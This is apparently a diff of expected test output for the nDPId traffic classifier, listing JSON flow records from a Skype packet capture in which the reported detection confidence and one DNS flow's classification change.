00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969698797,"flow_last_seen":1431969718921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 